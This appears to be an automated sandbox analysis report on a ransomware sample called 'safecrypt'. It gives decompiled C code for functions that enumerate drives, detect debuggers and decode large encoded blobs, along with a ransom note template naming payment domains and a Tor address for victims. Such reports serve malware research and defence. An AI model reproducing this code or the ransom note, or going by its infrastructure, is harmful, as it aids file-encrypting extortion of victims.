                    							_t60 = _t60 + 4;
                    							if(_t73 != _t78) {
                    								continue;
                    							}
                    							goto L8;
                    						}
                    						asm("sbb eax, eax");
                    						asm("sbb eax, 0xffffffff");
                    						goto L10;
                    						L32:
                    						_t53 = _t51 - _t71 >> 1;
                    						_t92 =  *(_t75 + 2 + _t53 * 2) - _t78;
                    						_t75 = _t75 + 2 + _t53 * 2;
                    					} while (_t92 != 0);
                    					goto L33;
                    				}
                    			}










































                    0x00413866
                    0x0041386c
                    0x00413873
                    0x00413884
                    0x00413889
                    0x0041388e
                    0x00413890
                    0x00413896
                    0x00413a4b
                    0x00413a4d
                    0x00413a4d
                    0x004138a9
                    0x004138bc
                    0x004138c3
                    0x004138c8
                    0x004138d1
                    0x004138d4
                    0x004138d9
                    0x004138dd
                    0x004138e1
                    0x004138e5
                    0x004138e9
                    0x004138ee
                    0x004138f2
                    0x004138f6
                    0x00413902
                    0x00413a1e
                    0x00413a1f
                    0x00413a2a
                    0x00000000
                    0x00000000
                    0x00413a2c
                    0x00413a31
                    0x00413a34
                    0x00413a39
                    0x00413a3a
                    0x00413a3d
                    0x00413a43
                    0x00000000
                    0x00413908
                    0x00413910
                    0x00413910
                    0x00413915
                    0x00413917
                    0x00413917
                    0x0041391d
                    0x00000000
                    0x00000000
                    0x00413922
                    0x00413939
                    0x00413939
                    0x00413942
                    0x00413944
                    0x00413946
                    0x00413960
                    0x00413965
                    0x00413965
                    0x0041396b
                    0x00000000
                    0x00000000
                    0x00413970
                    0x00413987
                    0x00413987
                    0x00413990
                    0x00413992
                    0x004139ae
                    0x004139b7
                    0x004139e9
                    0x004139ed
                    0x004139f2
                    0x004139f2
                    0x004139e9
                    0x004139f5
                    0x004139f7
                    0x00413a00
                    0x00413a00
                    0x00413a03
                    0x00413a06
                    0x00000000
                    0x00413a00
                    0x00413994
                    0x00413996
                    0x004139a0
                    0x004139a0
                    0x004139a3
                    0x004139a6
                    0x00000000
                    0x004139ab
                    0x00413972
                    0x0041397a
                    0x00000000
                    0x00000000
                    0x0041397c
                    0x0041397f
                    0x00413985
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413985
                    0x0041398b
                    0x0041398d
                    0x00000000
                    0x0041398d
                    0x00413948
                    0x00413950
                    0x00413950
                    0x00413953
                    0x00413956
                    0x00000000
                    0x0041395b
                    0x00413924
                    0x0041392c
                    0x00000000
                    0x00000000
                    0x0041392e
                    0x00413931
                    0x00413937
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413937
                    0x0041393d
                    0x0041393f
                    0x00000000
                    0x00413a0b
                    0x00413a0d
                    0x00413a0f
                    0x00413a14
                    0x00413a14
                    0x00000000
                    0x00413910

                    APIs
                      • Part of subcall function 004233B0: GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 004233B0: _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 004233B0: Sleep.KERNELBASE(0000000F), ref: 004233F7
                    • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004138A9
                    • _memset.LIBCMT ref: 004138C8
                    • ExitThread.KERNEL32 ref: 00413A4D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountDriveExitLogicalSleepStringsThreadTick_memset_rand
                    • String ID: A:\$B:\
                    • API String ID: 470154913-1009255891
                    • Opcode ID: 623ae09593b2aaaa469b7905b0b7b864cbe1e7b879361cc1708776148165362a
                    • Instruction ID: 637fea9b3573a5559568184255e6e8a8f2455f6862f94a87ca8b0662e454bd76
                    • Opcode Fuzzy Hash: 623ae09593b2aaaa469b7905b0b7b864cbe1e7b879361cc1708776148165362a
                    • Instruction Fuzzy Hash: 705116B21102018BD735DF24C882AFBB2A5FF94B15F844A1BE08597390E7B5DBC4C79A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E004256D3(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x43d01c; // 0xe0063daa
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x43e878 = _t6;
                    				 *0x43e874 = _t22;
                    				 *0x43e870 = _t25;
                    				 *0x43e86c = _t21;
                    				 *0x43e868 = _t27;
                    				 *0x43e864 = _t26;
                    				 *0x43e890 = ss;
                    				 *0x43e884 = cs;
                    				 *0x43e860 = ds;
                    				 *0x43e85c = es;
                    				 *0x43e858 = fs;
                    				 *0x43e854 = gs;
                    				asm("pushfd");
                    				_pop( *0x43e888);
                    				 *0x43e87c =  *_t31;
                    				 *0x43e880 = _v0;
                    				 *0x43e88c =  &_a4;
                    				 *0x43e7c8 = 0x10001;
                    				_t11 =  *0x43e880; // 0x0
                    				 *0x43e77c = _t11;
                    				 *0x43e770 = 0xc0000409;
                    				 *0x43e774 = 1;
                    				_t12 =  *0x43d01c; // 0xe0063daa
                    				_v812 = _t12;
                    				_t13 =  *0x43d020; // 0x1ff9c255
                    				_v808 = _t13;
                    				 *0x43e7c0 = IsDebuggerPresent();
                    				_push(1);
                    				E0042BD80(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter("p�C");
                    				if( *0x43e7c0 == 0) {
                    					_push(1);
                    					E0042BD80(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}



















                    0x004256d3
                    0x004256d3
                    0x004256d3
                    0x004256d3
                    0x004256d3
                    0x004256d3
                    0x004256d3
                    0x004256d9
                    0x004256db
                    0x004256db
                    0x004268fa
                    0x004268ff
                    0x00426905
                    0x0042690b
                    0x00426911
                    0x00426917
                    0x0042691d
                    0x00426924
                    0x0042692b
                    0x00426932
                    0x00426939
                    0x00426940
                    0x00426947
                    0x00426948
                    0x00426951
                    0x00426959
                    0x00426961
                    0x0042696c
                    0x00426976
                    0x0042697b
                    0x00426980
                    0x0042698a
                    0x00426994
                    0x00426999
                    0x0042699f
                    0x004269a4
                    0x004269b0
                    0x004269b5
                    0x004269b7
                    0x004269bf
                    0x004269ca
                    0x004269d7
                    0x004269d9
                    0x004269db
                    0x004269e0
                    0x004269f4

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 004269AA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004269BF
                    • UnhandledExceptionFilter.KERNEL32(pC), ref: 004269CA
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004269E6
                    • TerminateProcess.KERNEL32(00000000), ref: 004269ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: pC
                    • API String ID: 2579439406-3243261774
                    • Opcode ID: 0493313685780ae0ce296be0a983a6212c3911eaa44509a11c342e53e1a717ff
                    • Instruction ID: 332e7ea6ba5457cb4fea809ba2c2fce1ded50e1fbe9682d653700335dd9ef8e5
                    • Opcode Fuzzy Hash: 0493313685780ae0ce296be0a983a6212c3911eaa44509a11c342e53e1a717ff
                    • Instruction Fuzzy Hash: 0121AFB4902244DBE708EF27F8456947BF4FB08705F50697AE908872B0E7749982CF5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ....................$gfff
                    • API String ID: 0-3558827524
                    • Opcode ID: 0564a3c35e7526206c0d59ad9f969d706b830fd1fc9f2ddc4f602a9543d9929c
                    • Instruction ID: 98b8dc10b9cb77212152074cce9f87387e628b322ae6bcb3107b3beffe4dab0a
                    • Opcode Fuzzy Hash: 0564a3c35e7526206c0d59ad9f969d706b830fd1fc9f2ddc4f602a9543d9929c
                    • Instruction Fuzzy Hash: 24C1CF716483409BC314DF69D884A9BBBE4BFC8744F10492EF89987361E7B5D886CB86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: gfff
                    • API String ID: 2102423945-1553575800
                    • Opcode ID: 558cd6eb2fd0452d968ec2a777368e8a447e8d58c6de9b5768359a8db8e806ee
                    • Instruction ID: e61a0dfbe5edf450485f8e1759707897340d4aa92b7094de9ba0fd8b92b25654
                    • Opcode Fuzzy Hash: 558cd6eb2fd0452d968ec2a777368e8a447e8d58c6de9b5768359a8db8e806ee
                    • Instruction Fuzzy Hash: B4A1BE71A483019FC314CF29DC84A6BBBE5AFC8314F14892EF889C7352E674D945CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042B7C3() {
                    
                    				SetUnhandledExceptionFilter(E0042B781);
                    				return 0;
                    			}



                    0x0042b7c8
                    0x0042b7d0

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002B781), ref: 0042B7C8
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: dfdb0d2357c0cd46c004d6c91b5c0833340b8aa1958d13a1dd627f5cdc02a474
                    • Instruction ID: c0eddb95b0b60e64c1a8f1df41f0db4c86eaa527c24fe6535b8531239a93d15e
                    • Opcode Fuzzy Hash: dfdb0d2357c0cd46c004d6c91b5c0833340b8aa1958d13a1dd627f5cdc02a474
                    • Instruction Fuzzy Hash: 319002A0751151464B0017B06C5958526D0DBCC7127E11461A141C4465DB9540806599
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3eb14fc0cbca45a70c31b7de64b001672f234fecf3c2a43ffec21a36382552d6
                    • Instruction ID: 40b950bec1a2c9b0a29e90db16b05e695cab0f4e20d93883a41e86a71c22e22b
                    • Opcode Fuzzy Hash: 3eb14fc0cbca45a70c31b7de64b001672f234fecf3c2a43ffec21a36382552d6
                    • Instruction Fuzzy Hash: 2B41B675A012298BCB24DF24D5587FEB3B1EF94300F6445EBD80AD7341EA789ED18B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041EEE0(void* __edi) {
                    				char _v8;
                    				char _v12;
                    				void* __esi;
                    				intOrPtr _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t74;
                    				void* _t79;
                    				void* _t80;
                    				void* _t87;
                    				void* _t88;
                    				intOrPtr _t89;
                    				intOrPtr _t90;
                    				intOrPtr _t91;
                    				intOrPtr _t92;
                    				intOrPtr _t93;
                    				intOrPtr _t94;
                    				intOrPtr _t95;
                    				intOrPtr _t96;
                    				void* _t99;
                    				void* _t100;
                    
                    				_t86 = __edi;
                    				_t87 = 0;
                    				do {
                    					 *((intOrPtr*)(_t87 + 0x43fb18)) = E004258F2(_t79, __edi, _t87, 0x100);
                    					E0042C770(_t29, 0, 0x100);
                    					_t2 = _t87 + 0x43df08; // 0x434a0c
                    					_t3 = _t87 + 0x43fb18; // 0x0
                    					E00425A43( *_t3, 0x100,  *_t2);
                    					_t87 = _t87 + 4;
                    					_t99 = _t99 + 0x1c;
                    				} while (_t87 < 0x2f8);
                    				 *0x43f9dc = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fb14 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe10 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fb10 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe14 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe1c = E004258F2(_t79, _t86, _t87, 0x100);
                    				 *0x43fb0c = E004258F2(_t79, _t86, _t87, 0x100);
                    				_t40 = E004258F2(_t79, _t86, _t87, 0x100);
                    				_t100 = _t99 + 0x20;
                    				 *0x43fe18 = _t40;
                    				_t88 = 0;
                    				do {
                    					_t4 = _t88 + 0x43df08; // 0x434a0c
                    					_t41 =  *_t4;
                    					_t5 = _t41 + 1; // 0x434a0d
                    					_t80 = _t5;
                    					do {
                    						_t74 =  *_t41;
                    						_t41 = _t41 + 1;
                    					} while (_t74 != 0);
                    					_v12 = _t41 - _t80;
                    					_t8 = _t88 + 0x43fb18; // 0x0
                    					E004128B0( &_v12,  *_t8,  &_v12);
                    					_t88 = _t88 + 4;
                    					_t100 = _t100 + 8;
                    				} while (_t88 < 0x2f8);
                    				_t89 =  *0x43f9dc; // 0x0
                    				_v8 = 0x80;
                    				E0042E030(_t89, "ZVYyiyeK7fqE2k2HnBfsVr0DHF8XIAqu6AanwrnMsufMa9Irz/f5H5cioY5RIt9LS/Yb+rZlVypG2h1Om0yp0wRaBQqjB2juMoubm4b5xdxD8kEWab9YlDUv5AJf1G==", 0x80);
                    				E004128B0( &_v12, _t89,  &_v8);
                    				_t90 =  *0x43fb14; // 0x0
                    				_v8 = 0x60;
                    				E0042E030(_t90, "6X4tP/+zB4D/aPs1qQWJsZfCDCWrNPc+svEMvqsfBoZprMGIcGH8ikSBiuPfJjALYX92k6z+XYqREfLnVabGWW5ppgk1Ie==", 0x60);
                    				E004128B0( &_v8, _t90,  &_v8);
                    				_t91 =  *0x43fe10; // 0x0
                    				_v8 = 0x74;
                    				E0042E030(_t91, "qdyGPYZZSvdGicN98ZVXRKiFU9pmJbzkbreC29QzjHr/DNdk4j4+++06d8cyg8AYoAjEAxRflWawlywLIclSDa/baixBI4WnCwP4RLcTsT+oa88jRX6=", 0x74);
                    				E004128B0( &_v8, _t91,  &_v8);
                    				_t92 =  *0x43fb10; // 0x0
                    				_v8 = 0x74;
                    				E0042E030(_t92, "UQLFCdKQukVOHhxaAZ4bZ2E0ruT0B1rLn2EK7fufWff3zdrX81hEz9XxdqvEiJXlyPrm38HIXmFUBk9+wI+RC5chZUrDTHGo51hOw1921mvzZLgEFZO=", 0x74);
                    				E004128B0( &_v8, _t92,  &_v8);
                    				_t93 =  *0x43fe14; // 0x0
                    				_v8 = 0x60;
                    				E0042E030(_t93, "AaQ5vc2CWsL3h3L+HjQhm6yykARs471MboQDeuH2zbWHNFRYWGX0st20jUwKl4DmIVb1X332Oio6Q2VS/YsQg2qM7wgA58==", 0x60);
                    				E004128B0( &_v8, _t93,  &_v8);
                    				_t94 =  *0x43fe1c; // 0x0
                    				_v8 = 0x40;
                    				E0042E030(_t94, "4zSNFcBmKiiVtwCF3qiBepqETGwjDjaNvDWV168j6up/lIgtEi7bIVOPQwhd4q==", 0x40);
                    				E004128B0( &_v8, _t94,  &_v8);
                    				_t95 =  *0x43fb0c; // 0x0
                    				_v8 = 0x80;
                    				E0042E030(_t95, "0G1EJXDCpmMp6j5FF5PxDideqCApFKHQU2O8PeBznYYQNH0EDcOnM91I0SwDHUUDEEdjfWu945Y/wj+RyOmsBR1snTIRuqNPl+5DyZEHp565JkTwmhOcyf9D9QVdtV==", 0x80);
                    				E004128B0( &_v8, _t95,  &_v8);
                    				_t96 =  *0x43fe18; // 0x0
                    				_v8 = 0x40;
                    				E0042E030(_t96, "nIxIwVzr8swLXIvnBH/DM1mYMonC6p9cbdYrUPRSXSGdrr3k3AOrKkZ8fg6bkz==", 0x40);
                    				E004128B0( &_v8, _t96,  &_v8);
                    				_v8 = 0x648;
                    				 *0x460aac = E004258F2( &_v8, _t86, _t96, 0x3e80);
                    				E0042E030(_t63, "5f1wxxm5aEJbn/raYtjNGxwTCFxJD13ZlJcD6UhiJg448aLhNtkkRf11e8nOZT18z6ATFg18D67X6Pgwiw9tr/5oEqhi6mBygRqJIpCSUMKKf7CBVCT0Aw/fBB0ZJAiOMRif1gCy04ap4bhmG97Nvy7sfPPPFJdxzdx67gu677u6vwfADdElGJsGh5D6N3EzyR85x0SL00IyI6wpgSlAo1SZGLjfWLBqBUVMWTTYLHOJUJECOWKd6DYOyjJlQbrlD/widq9n3YB0XoQNbtWyOqOFa7pnL6U2vYyCI35gz1QCXqL737wheYo4tb9BM5ueunW5As2OHqf+PRjUD93wi2ARZ9iv2fVUXYzwRn/nlEfDavISzffV0R7Q13aB/IhzxImvdGGH209Gq/nHQFjq96WJQmOut2kh/IcLCaE890UGo8Ho4aQVaIoLQtoGblVWVL8WJbYMKLz8JgnnjK/W1vHFS/8WDC5TLi1rU1aVl3BIsUwMejM5/cF4jD9BdfBjzHyvMpxXPGDZqvFQXx8kQ9+FMixbuFQ1exAUE9GWHffx3e0qnnMFBrlae4PfUo85nN0VgNn2zVPuCulCLmCSxy9wfe0QFq5Z9F+Svuc0GPLtwzYsOs5C/42fBylHYwjmGVHBOtC4Xwh7K+bdFw/CH+/vh6rftUzJoMNb17mx9j682ErAb0X9A+jbLpRreObgDWNxOx0BZYEUS2KkGHnk4z33ggDzw3LFXWmnUXpzsuh7Lbwe5pwy/YUDH8aJt59zvNC+NUkH480Bru/nLiOZxNGNwm6DuFspLZTCIaqEDjYj8l3wbE1wsKoNPNnvwyTOQi1MvP9w6OLtNtUYpzBodPskCMRBB6xKnuF40MOzsSTiBIv2sJ1b6Y5ucIH3gVNLl06jr1e5GMy140gPGwTZjZ6HVWBdIQQITChpfFiXdPzf9t4Q7Yv6qcTVBdNYaj3Yml6FKz4xseAUgiiAmKFZMfn3JLS1hf8RjzleqVVSMCsueKeJ8T417Cf1pSbchQflHrBgoD8PV8Gluh4mdbFUYtAiZyL55L9Cjn0bC6Qr3aFwcXOqkCR7kfkp51I3oaYTy4i1lJ2Z2CJezJyE1wf0wIoy5P8yg1tGdd4MB5ysey5SomERWTqMevvUkPmtS0E9pNEf1kLMx9BsJjoxkQKiTjAt0BGQRHXEHuQV5WOxksLqL5W/2mQ6UYJ2YdvjYSFwdrQyrLHGB7Zps2SJ117raFYWnFIKODEL/cgybJoATs3POo4Y938Tj8/yUH7Gv70D6k56Y76kUcncpWKA8uYsFsPU0ClCu5cR4W078YtOp7CckoACQMLmY8mEclaesKABD8RSNYtMJnchNWU+a11oljORAd2x/LeJzO3H1Lr1rDE85WGw6tg93pwn07lKvQoep9nSQjvngX8TLw0ZnRz0RuWsZaZyXMQorV5jFfmeLvjk6lmawAFGQOi+iGE95rG/6xPAdaQyiwH+mV9L2bOX8ZRTol5iMIRjdoE9habuQ4AAcr9wR2vSxFabtSBlAjb5G23HeRJ/7C6Ix1EWgAV7S4XflafgHqOuGl4JSSLFsFEQLZLLh96Ojc0GTdKr+9nB9s27aJ6K", 0x648);
                    				E004128B0( &_v8, _t63,  &_v8);
                    				E00425D1D( *0x460aac, 0x3e80, "1. http://pot98bza3sgfjr35t.fausttime.com/%S\r\n2. http://h5534bvnrnkj345.maniupulp.com/%S\r\n3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\r\nIf for some reasons the addresses are not available, follow these steps:\r\n1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en \r\n2. After a successful installation, run the browser and wait for initialization.\r\n3. Type in the address bar: wbozgklno6x2vfrk.onion/%S \r\n4. Follow the instructions on the site.\r\n\r\n!!! IMPORTANT INFORMATION:\r\n!!! Your personal pages:\r\nhttp://pot98bza3sgfjr35t.fausttime.com/%S\r\nhttp://h5534bvnrnkj345.maniupulp.com/%S\r\nhttp://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S \r\n!!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S \r\n!!! Your personal identification ID: %S\r\n\r\n");
                    				_v8 = 0x1734;
                    				 *0x4647bc = E004258F2( &_v8, _t86, _t63, 0x7d00);
                    				E0042E030(_t68, "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